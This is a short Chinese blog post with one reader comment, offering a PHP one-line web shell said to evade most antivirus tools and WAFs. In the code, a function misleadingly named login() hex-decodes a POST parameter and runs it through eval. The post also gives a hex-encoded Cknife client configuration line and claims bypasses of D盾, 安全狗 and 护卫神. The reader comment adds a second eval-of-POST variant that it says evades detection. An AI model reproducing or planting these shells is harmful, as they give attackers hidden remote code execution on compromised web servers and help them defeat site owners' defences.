可能过90% 安全软件和waf的PHP一句话。

热度s:588℃ 评论:2 发布时间:2018-09-09 收录:已收录

可能过90% 安全软件和waf的PHP一句话。
PHP代码:

<?php
function login(){
        $t=$_POST[0];
        for ($i=0;$i<strlen($t);$i+=2) 
    $c.=urldecode("%".substr($t,$i,2)); 
    return $c;
}
eval(login());
?>

修改Cknife配置文件:

PHP_MAKE=@eval\u0001(base64_decode($_POST[action]));

修改成

PHP_MAKE=406576616C286261736536345F6465636F646528245F504F53545B616374696F6E5D29293B

已测 过D盾、安全狗、护卫神
其实还有一个更简短的方法,暂时不放出来了。。放的多容易被喷。

本文由 Mr.Wu 创作,除注明转载/出处外,均为本站原创,转载前请注明出处!

2条回应:“可能过90% 安全软件和waf的PHP一句话。”

  1. 流光streamer说道:

    function fun()
    {@$b=($_POST[a]);
    return @$b;
    }
    eval(fun());

    D盾貌似不杀不带$的eval()

  2. t00ls说道:

    兄台,是t00ls的 xiaoniu?

发表评论

电子邮件地址不会被公开。 必填项已用*标注

顶部
护眼